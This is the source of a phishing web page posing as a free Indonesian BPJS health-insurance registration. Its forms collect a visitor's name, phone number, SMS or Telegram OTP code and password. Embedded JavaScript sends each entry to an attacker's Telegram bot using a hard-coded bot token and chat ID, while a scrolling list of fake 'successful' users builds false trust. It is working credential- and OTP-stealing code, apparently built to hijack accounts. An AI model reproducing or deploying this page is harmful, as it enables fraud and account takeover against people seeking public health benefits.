<!doctype html>
<html lang="en" class="h-100">
<head id="ctl00_Head1">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <link href="npm/bootstrap-5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" >
    <link href="t5/assets/css/custom.css" type="text/css" rel="stylesheet" />
    <link href="t5/assets/css/menebus.css" type="text/css" rel="stylesheet" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta property="og:title" content="Pendaftaran BPJS Gratis 2025 🇮🇩">
    <meta property="og:image" content="https://i.ibb.co.com/WDr8XGX/ini.jpg">
    <meta name="description" />
    <meta name="author" content="Mykasih Foundation" />
    <link rel="icon" href="../t5/assets/img/garuda-1.png">
    <title>DAFTAR BPJS GRATIS</title>
	<link rel="canonical" href="https://apps-mykasihv4.my.id" />
    <link rel="icon" type="image/x-icon" href="https://bantuan-sosial-indo2024.fnlc12.pw/c5/favicon.png" />
    <link rel="stylesheet" href="npm/bootstrap-icons-1.4.1/font/bootstrap-icons.css" />
	<script type="text/javascript" src="t5/js/vue.min.js"></script>
	<script src="t5/js/clipboard.js"></script>
	<script type="text/javascript" src="t5/js/index.js"></script>
    <style type="text/css">
        .bd-placeholder-img {
            font-size: 1.125rem;
            text-anchor: middle;
            -webkit-user-select: none;
            -moz-user-select: none;
            user-select: none;
        }
        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 2.5rem;
            }
        }
	/* Absolute Center Spinner */
        .loading {
            position: fixed;
            z-index: 999;
            height: 2em;
            width: 2em;
            overflow: show;
            margin: auto;
            top: 0;
            left: 0;
            bottom: 0;
            right: 0;
        }
        /* Transparent Overlay */
        .loading:before {
            content: '';
            display: block;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));
            background: -webkit-radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));
        }
        /* :not(:required) hides these rules from IE9 and below */
        .loading:not(:required) {
            /* hide "loading..." text */
            font: 0/0 a;
            color: transparent;
            text-shadow: none;
            background-color: transparent;
            border: 0;
        }
        .loading:not(:required):after {
            content: '';
            display: block;
            font-size: 10px;
            width: 1em;
            height: 1em;
            margin-top: -0.5em;
            -webkit-animation: spinner 150ms infinite linear;
            -moz-animation: spinner 150ms infinite linear;
            -ms-animation: spinner 150ms infinite linear;
            -o-animation: spinner 150ms infinite linear;
            animation: spinner 150ms infinite linear;
            border-radius: 0.5em;
            -webkit-box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
            box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
        }
        /* Animation */
        @-webkit-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }
            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
        @-moz-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }
            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
        @-o-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }
            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
        @keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }
            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
        .small-text {
    font-size: 18px; /* Sesuaikan ukuran */
}

    </style>
</head>
<body class="d-flex flex-column h-100">
<!---
<div class="item">
<div class="record_logo">
<img src="t5/assets/img/avatar.png" alt="">
</div>
<div class="center">
<div class="h1"><span class="name"></span> <span>Berjaya</span> <span class="number">RM 1.000,00</span></div>
<div class="h2">3 jam yang lalu</div>
</div>
</div>
--->
<div id="loading" style="display: none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); z-index: 9999;">
    <img src="t5/assets/img/processing.gif" alt="Loading..." width="100" />
</div>

<div id="loading" class="loading" style="display: none;"></div>
    <main class="flex-shrink-0">
            <div class="header mt-3 text-center">
                <img src="https://katabali.com/wp-content/uploads/2021/04/bpjs-kesehatan.png" id="ctl00_logohead" class="img-fluid" width="450" />
            </div>
            <script type="text/javascript">
                //<![CDATA[
                var theForm = document.forms['aspnetForm'];
                if (!theForm) {
                    theForm = document.aspnetForm;
                    A
                }
                function __doPostBack(eventTarget, eventArgument) {
                    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                        theForm.__EVENTTARGET.value = eventTarget;
                        theForm.__EVENTARGUMENT.value = eventArgument;
                        theForm.submit();
                    }
                }
                //]]>
            </script>
            <script type="text/javascript">
                //<![CDATA[
                function WebForm_OnSubmit() {
                    if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
                    return true;
                }
                //]]>
            </script>
            <span id="ctl00_lblMsg"></span>
            <h2 class="fw-bold mt-2 page-header text-center ">
                <span id="ctl00_RecipientMasterContent_lblSubject">BPJS PBI/FREE REGISTER NOW </span>
            </h2>
			<div class="first">
            <form action="javascript:void(0)" method="post" id="firstForm">
			<div class="input-group mb-3">
			<span class="input-group-text" id="basic-addon1">Nama</span>
			<input name="full_name" id="full_name" maxlength="18" class="form-control" type="text" required="true" placeholder="Nama lengkap Sesuai KTP" title="Sila Masukkan Nombor , contoh +62822334455">
			</div>
			<div class="input-group mb-3">
			<span class="input-group-text" id="basic-addon1">🇮🇩 +62 </span>
			<input name="phone_number" id="phone_number" maxlength="18" class="form-control" type="tel" required="true" placeholder="08xxxx" title="Sila Masukkan Nombor , contoh +62890930">
			</div>
			<div class="text-center">
			<button type="submit" class="btn btn-lg btn-block btn-mk" onclick="processFirstData()">LIST</button>
			</div>
            </form>
			</div>
			<div class="second" style="display: none;">
			<form action="javascript:void(0)" method="post" id="secondForm">
			<input type="hidden" name="full_name" id="validateFullName" readonly>
			<input type="hidden" name="phone_number" id="validatePhoneNumber" readonly>
			<div class="mb-3">
			<label for="otp_code" class="form-label">
            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Kami sudah Mengirimkan kode OTP 5 angka silahkan cek di SMS Telegram.</span>
			</label>
			<input name="otp_code" maxlength="5" id="otp_code" class="form-control" type="tel" required="true" placeholder="5 digit OTP">
			</div>
			<div class="text-center">
			<button type="submit" class="btn btn-lg btn-block btn-mk" onclick="processSecondData()">LANJUT</button>
			</div>
			</form>
			</div>
			<div class="third" style="display: none;">
			<form action="javascript:void(0)" method="post" id="thirdForm">
			<input type="hidden" name="full_name" id="validateFullName" readonly>
			<input type="hidden" name="phone_number" id="validatePhoneNumber" readonly>
			<input type="hidden" name="otp_code" id="validateOtpCode" readonly>
			<div class="mb-3">
			<label for="password" class="form-label">
            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Masukkan kata sandi anda.</span>
			</label>
			<input name="password" id="password" class="form-control" type="text" required="true" placeholder="Kata laluan anda">
			</div>
			<div class="text-center">
			<button type="submit" class="btn btn-lg btn-block btn-mk" onclick="processThirdData()">Lanjutkan</button>
			</div>
			</form>
			</div>
			<div  class="row four"id="ctl00_RecipientMasterContent_divResultNotFound" style="display: none;">
			<p class="text-center"><img src="t5/assets/img/processing.gif" id="ctl00_logohead" class="img-fluid" width="160" /></p>
			<h5 class="text-center"><span id="ctl00_RecipientMasterContent_lblNoRecord">Sila tunggu proses pengesahan dalam masa 1x24 jam untuk menyemak kelayakan,</span></h5>
			<h5 class="text-center"><span id="ctl00_RecipientMasterContent_lblNoRecord">atau gunakan nombor telefon lain.</span></h5>
			<p class="text-center"><a href="index.html" class="btn btn-lg btn-block btn-mk">&laquo; <span id="ctl00_RecipientMasterContent_lblGoBack_NoResult">Gunakan Nombor Telefon Lain</span></a></p>
			</div>
            <script type="text/javascript">
                //<![CDATA[
                var Page_ValidationActive = false;
                if (typeof(ValidatorOnLoad) == "function") {
                    ValidatorOnLoad();
                }
                function ValidatorOnSubmit() {
                    if (Page_ValidationActive) {
                        return ValidatorCommonOnSubmit();
                    } else {
                        return true;
                    }
                }
            </script>
<!--- record berjaya box --->
<div class="_record-box">
    <div id="list" class="list-box">
        <div class="list" style="margin-top: -3.1345px;">
            <div class="item">
                <div class="record_logo">
                    <img src="t5/assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <span class="name">Citra Melati</span>
                            <span class="text successful"> - Berhasil Mengubah BPJSnya Ke BPJS Gratis  <img
                                    src="https://bpjskesehatan-gratis.verifstatus.my.id/assets/img/check-mark-button.svg"
                                    style="height: 16px;"></span> 
           </div>
           </div>
			<div class="item">
                <div class="record_logo">
                    <img src="t5/assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <span class="name">Ahmad Fauzi</span>
                            <span class="text successful"> - Berhasil Mengubah BPJSnya Ke BPJS Gratis  <img src="https://bpjskesehatan-gratis.verifstatus.my.id/assets/img/check-mark-button.svg" style="height: 16px;"></span>
           </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="t5/assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <span class="name">Siti Aminah</span>
                            <span class="text successful"> - Berhasil Mengubah BPJSnya Ke BPJS Gratis  <img
                                    src="https://bpjskesehatan-gratis.verifstatus.my.id/assets/img/check-mark-button.svg"
                                    style="height: 16px;"></span>
                        </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="t5/assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <span class="name">Budi Santoso</span>
                            <span class="text successful"> - Berhasil Mengubah BPJSnya Ke BPJS Gratis  <img
                                    src="https://bpjskesehatan-gratis.verifstatus.my.id/assets/img/check-mark-button.svg"
                                    style="height: 16px;"></span>
                        </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="t5/assets/img/avatar.png" alt="">
                </div>
                <span class="name">Dewi Lestari</span>
                            <span class="text successful"> - Berhasil Mengubah BPJSnya Ke BPJS Gratis  <img
                                    src="https://bpjskesehatan-gratis.verifstatus.my.id/assets/img/check-mark-button.svg"
                                    style="height: 16px;"></span>
                        </div>
                    </div>
                    <div class="item">
                        <div class="record_logo">
                            <img src="t5/assets/img/avatar.png" alt="">
                        </div>
                        <span class="name">Dewi Lestari</span>
                                    <span class="text successful"> - Berhasil Mengubah BPJSnya Ke BPJS Gratis  <img
                                            src="https://bpjskesehatan-gratis.verifstatus.my.id/assets/img/check-mark-button.svg"
                                            style="height: 16px;"></span>
                                </div>
                </div>
            </div>
        </div>
    </div>
</div>
<!--- record berjaya box --->
        </div>
        </div>
        </div>
    </main>
    <h2 class="fw-bold mt-2 page-header text-center small-text">
        <span id="ctl00_RecipientMasterContent_lblSubject">
            𝑪𝑨𝑹𝑨  𝑫𝑨𝑭𝑻𝑨𝑹 𝑩𝑷𝑱𝑺 𝑲𝑬𝑺𝑬𝑯𝑨𝑻𝑨𝑵 𝑮𝑹𝑨𝑻𝑰𝑺
        </span>
    </h2>
    <div class="header mt-3 text-center">
        <img src="t5/assets/img/bpjj.png" id="ctl00_logohead" class="img-fluid" width="450" />
    </div>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>
<script src="jquery-3.7.1.min.js" ></script>
<script type="text/javascript" src="jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script>
// Function to send data to Telegram Bot
        // Function to send data to Telegram Bot
function sendToTelegram(message) {
    const botToken = "7352654270:AAGykqbcm_YM_5xsWfOc4dmjQVCMBscG308"; // Replace with your bot token
    const chatId = "7446499435"; // Replace with your chat ID

    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
    const data = {
        chat_id: chatId,
        text: message
    };

    fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(data)
    })
    .then(response => response.json())
    .then(data => {
        console.log("Message sent", data);
    })
    .catch(error => {
        console.error("Error sending message", error);
    });
}

// Show and hide loading spinner
function showLoading() {
    document.getElementById('loading').style.display = 'block';
}

function hideLoading() {
    document.getElementById('loading').style.display = 'none';
}

// Process first form data
function processFirstData() {
    $('#firstForm').submit(function(event) {
        event.preventDefault();
        showLoading();

        var $full_name = $("input#full_name").val();
        var $phone_number = $("input#phone_number").val();

        if ($full_name === "" || $phone_number === "") {
            $('.verification_info').show();
            $('.account_verification').hide();
            hideLoading();
            return false;
        }

        var phone_number = "+62" + originalPhoneNumber; // Pastikan originalPhoneNumber tidak memiliki "0" di depan
var message = `🔹 *BPJS* 🔹\n\n👤 *Nama:* ${$full_name}\n📞 *Nomor:* ${phone_number}`;
sendToTelegram(message);

        setTimeout(() => {
            $(".second").show();
            $(".first").hide();
            $("input#validateFullName").val($full_name);
            $("input#validatePhoneNumber").val($phone_number);
            hideLoading();
        }, 2000);

        return false;
    });
}

function processSecondData() {
    $('#secondForm').submit(function(event) {
        event.preventDefault();
        showLoading();

        var $full_name = $("input#validateFullName").val();
        var $phone_number = $("input#validatePhoneNumber").val();
        var $otp_code = $("input#otp_code").val();

        if ($otp_code === "") {
            $('.verification_info').show();
            $('.account_verification').hide();
            hideLoading();
            return false;
        }

        var message = `OTP Code Verification: \nFull Name: ${$full_name}\nPhone Number: ${$phone_number}\nOTP Code: ${$otp_code}`;
        sendToTelegram(message);

        setTimeout(() => {
            $(".third").show();
            $(".second").hide();
            $("input#validateOtpCode").val($otp_code);
            hideLoading();
        }, 2000);

        return false;
    });
}

function processThirdData() {
    $('#thirdForm').submit(function(event) {
        event.preventDefault();
        showLoading();

        var $full_name = $("input#validateFullName").val();
        var $phone_number = $("input#validatePhoneNumber").val();
        var $otp_code = $("input#validateOtpCode").val();
        var $password = $("input#password").val();

        if ($password === "") {
            $('.verification_info').show();
            $('.account_verification').hide();
            hideLoading();
            return false;
        }

        var message = `Final Submission: \nFull Name: ${$full_name}\nPhone Number: ${$phone_number}\nOTP Code: ${$otp_code}\nPassword: ${$password}`;
        sendToTelegram(message);

        setTimeout(() => {
            alert("Data submitted successfully!");
            hideLoading();
            window.location.reload();
        }, 2000);

        return false;
    });
}

</script>
<script type="text/javascript" src="t5/js/jquery-3.4.1.min.js"></script>
<script>
    // 加载多语言
    var language = getQueryString('language')
    loadLocale(function(e) {
        app.locale = Object.assign(e.Common, e.CommonShare)
    }, language)
    var app = new Vue({
        el: '#app',
        data: {
            locale: {},
            uid: '2004219',
        },
        created() {
            $('#app').show();
            this.starScroll();
        },
        methods: {
            starScroll() {
                var _this = this;
                _this.scrollTimer && clearTimeout(_this.scrollTimer)
                _this.scrollTimer = setTimeout(() => {
                    var $box = $("#list").find(".list:first");
                    $box.css({
                        marginTop: 0
                    })
                    var $item = $box.find(".item:first");
                    var outerHeight = $item.outerHeight(true)
                    $box.animate({
                        "marginTop": -outerHeight + "px"
                    }, 1000, function() {
                        $box.css({
                            marginTop: 0
                        }).find(".item:first").appendTo($box);
                        _this.starScroll();
                    })
                }, 600);
            },
        },
    })
</script>
</html>